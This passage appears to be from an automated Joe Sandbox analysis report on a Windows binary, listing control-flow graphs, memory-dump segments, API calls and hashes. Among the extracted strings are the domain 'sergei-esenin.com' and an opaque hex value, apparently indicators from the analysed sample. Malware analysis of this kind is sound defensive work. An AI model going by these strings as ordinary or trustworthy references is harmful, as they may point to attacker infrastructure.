                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: cb9549149c697a4cb8821e87df181ab6c26a68d4d03fb22c9acd0ad72a33b00e
                                                                                                                                                                                                        • Instruction ID: 9c604601a661a07936639335936648bee97af758df37e97d34bbe0ef8f9f94dd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb9549149c697a4cb8821e87df181ab6c26a68d4d03fb22c9acd0ad72a33b00e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 922139B490021A9FDB15CF94CC90BBFBBB1FB4A304F144849E411BB292C775A951CFA4

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 0 562f94-562fd6 call 58f420 3 56301b-563084 0->3 4 562fd8 0->4 6 563086 3->6 7 5630cb-5630dd 3->7 5 562fe0-563019 call 56b6f0 4->5 5->3 9 563090-5630c9 call 56b670 6->9 10 5630df-5630e5 7->10 11 5630fb-563103 7->11 9->7 16 5630f0-5630f9 10->16 12 563105-563106 11->12 13 56311b-563127 11->13 17 563110-563119 12->17 18 56313b-563146 13->18 19 563129-56312f 13->19 16->11 16->16 17->13 17->17 22 56315b-563271 18->22 23 563148-563149 18->23 21 563130-563139 19->21 21->18 21->21 25 563273 22->25 26 5632bb-5632ee 22->26 24 563150-563159 23->24 24->22 24->24 27 563280-5632b9 call 56b7c0 25->27 28 5632f0-563329 call 56b770 26->28 29 56332b-56335c call 560b50 26->29 27->26 28->29 36 563387-5633aa 29->36 37 563377-563386 CoUninitialize 29->37 38 5634c2-5634c5 29->38 39 563363-563370 29->39 40 5634b3-5634bf call 58eb00 29->40 41 563400-563406 call 553a90 29->41 42 5634c0 29->42 43 56340f-563419 call 55caa0 29->43 44 56341c-56345d call 554550 29->44 45 5634cc-5634f9 29->45 60 5633b1 36->60 61 5633ac-5633af 36->61 38->36 38->37 38->38 38->39 38->40 38->41 38->42 38->43 38->44 38->45 39->37 39->38 39->40 39->41 39->42 39->43 39->44 39->45 40->42 41->43 43->44 63 56345f 44->63 64 56349b-5634ac call 5546a0 44->64 49 56353b-563565 call 5546a0 45->49 50 5634fb 45->50 66 563567 49->66 67 5635ab-5635e9 call 5546a0 49->67 57 563500-563539 call 56b870 50->57 57->49 69 5633b2-5633c8 60->69 61->60 61->69 65 563460-563499 call 56b820 63->65 64->38 64->40 64->42 64->45 65->64 72 563570-5635a9 call 56b8c0 66->72 82 56362b-56373c call 5546a0 call 564080 call 554b00 call 55d4e0 call 579510 call 55dcc0 call 55d4e0 call 579bb0 call 55dcc0 call 55d4e0 call 579e30 call 55dcc0 call 55d4e0 call 57c470 call 57ccd0 call 57d0f0 call 57fd10 call 55dcc0 call 55d4e0 call 57ec10 call 55dcc0 call 55d4e0 call 5823e0 call 588720 67->82 83 5635eb 67->83 75 5633cf 69->75 76 5633ca-5633cd 69->76 72->67 80 5633d0-5633f9 call 55ca90 call 5900d0 call 593220 75->80 76->75 76->80 80->37 80->38 80->40 80->41 80->42 80->43 80->44 80->45 141 563743-563749 call 5888a0 82->141 142 56374c-563787 call 55dcc0 82->142 86 5635f0-563629 call 56b940 83->86 86->82 141->142 148 5637c5-5637e7 142->148 149 563789 142->149 151 563825-563880 148->151 152 5637e9 148->152 150 563790-5637c3 call 56ba70 149->150 150->148 153 5638c5-5638cb 151->153 154 563882 151->154 156 5637f0-563823 call 56ba20 152->156 158 5638cd-5638d6 153->158 159 5638eb-5638f3 153->159 157 563890-5638c3 call 56b9a0 154->157 156->151 157->153 163 5638e0-5638e9 158->163 164 5638f5-5638f6 159->164 165 56390b-563914 159->165 163->159 163->163 168 563900-563909 164->168 169 563916-563919 165->169 170 56392b-563936 165->170 168->165 168->168 171 563920-563929 169->171 172 56394b-563954 170->172 173 563938-563939 170->173 171->170 171->171 175 563956-563959 172->175 176 56396b-563977 172->176 174 563940-563949 173->174 174->172 174->174 177 563960-563969 175->177 178 563991-563a75 176->178 179 563979-56397b 176->179 177->176 177->177 181 563aa6-563acc 178->181 182 563a77 178->182 180 563980-56398d 179->180 180->180 183 56398f 180->183 185 563ace-563acf 181->185 186 563afa-563b22 call 560b50 181->186 184 563a80-563aa4 call 56bb20 182->184 183->178 184->181 189 563ad0-563af8 call 56bad0 185->189 194 563bb7-563bc0 call 55caa0 186->194 195 563b4c-563b63 186->195 196 563b29-563b32 186->196 197 563bd9 186->197 189->186 194->197 199 563b65-563b68 195->199 200 563b6a 195->200 196->195 199->200 202 563b6b-563b7e 199->202 200->202 203 563b85 202->203 204 563b80-563b83 202->204 205 563b86-563baf call 55ca90 call 5900d0 call 593220 call 553a90 203->205 204->203 204->205 205->194
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Uninitialize
                                                                                                                                                                                                        • String ID: AR]J$E9F71194B083C636ED0186A1FFE92B78$HLB6$YTfT$[Pcl$jXl>$jxEJ$sergei-esenin.com$IK
                                                                                                                                                                                                        • API String ID: 3861434553-506854138
                                                                                                                                                                                                        • Opcode ID: 242c511aba1f23303b32cedf0c00249739e303859cfd1a218963131675af3aa1
                                                                                                                                                                                                        • Instruction ID: 144ab36c3b128f02fbbdc1e7ba3a532195139ff2e48e20abd56e0371377d3210
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 242c511aba1f23303b32cedf0c00249739e303859cfd1a218963131675af3aa1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 586296B0100B808BD7229F34D895BA7BBF5FF1A304F44496DE4EB8B252D735A658CB21

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 517 593220-59322f 518 5932ac-5932b0 517->518 519 5932a0 517->519 520 5932a2-5932a6 RtlFreeHeap 517->520 521 593236-593252 517->521 519->520 520->518 522 593254 521->522 523 593286-593296 521->523 524 593260-593284 call 595af0 522->524 523->519 524->523
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000), ref: 005932A6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                        • Opcode ID: e95abcf179093efd85a3eb993375951bc5a0be2f2be6d7e83e65e4f7be5501ff
                                                                                                                                                                                                        • Instruction ID: 58f653a7f2cb3b4cd2908344f79379dd0d18fa4ac8e67aec633b62ff4cf226a8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e95abcf179093efd85a3eb993375951bc5a0be2f2be6d7e83e65e4f7be5501ff
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C014B3450D240DBCB01AB18E845A1ABBE8EF5A705F054C1CE5C58B361D235DD64DBA6

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 527 58f54b-58f596 528 58f598 527->528 529 58f5cb-58f5ec SysAllocString 527->529 530 58f5a0-58f5c9 call 592f20 528->530 532 58f5f0-58f5f2 529->532 530->529
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706585867.0000000000794000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706600323.0000000000795000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706641995.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706658679.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706676367.00000000007A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706689237.00000000007AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706702133.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706714808.00000000007BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706726945.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706741721.00000000007C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706752739.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706767286.00000000007E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706779985.0000000000809000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706813924.0000000000836000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706827409.0000000000837000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706839585.000000000083F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706865854.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706878053.000000000084D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_550000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocString
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2525500382-0
                                                                                                                                                                                                        • Opcode ID: 35a421aa349f70917ff631594ce25084dfacabada86ebac9ce7e5b1e775569f4
                                                                                                                                                                                                        • Instruction ID: 91a1257ad27e79c2cf6c4b2b66a5d89e3402d6c5192aebc0791584cb0ac17747
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35a421aa349f70917ff631594ce25084dfacabada86ebac9ce7e5b1e775569f4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A012CB0108341ABE340DF14C484A1FBFF5AB86398F84994CF5C89B2A2D735D844CBA2

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 536 58f5fc-58f616 CoSetProxyBlanket
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0058F60F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.1706016456.0000000000551000.00000040.00000001.01000000.00000003.sdmp, Offset: 00550000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706000584.0000000000550000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706076323.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706100241.00000000005BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706147304.00000000005BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706165591.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706297117.0000000000716000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706325321.0000000000718000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706372870.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706383917.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706394945.0000000000746000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706409568.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706429444.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706481028.000000000077F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706518694.0000000000780000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706535658.0000000000789000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706548305.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.1706571242.0000000000792000.00000080.00000001.01000000.00000003.sdmpDownload File
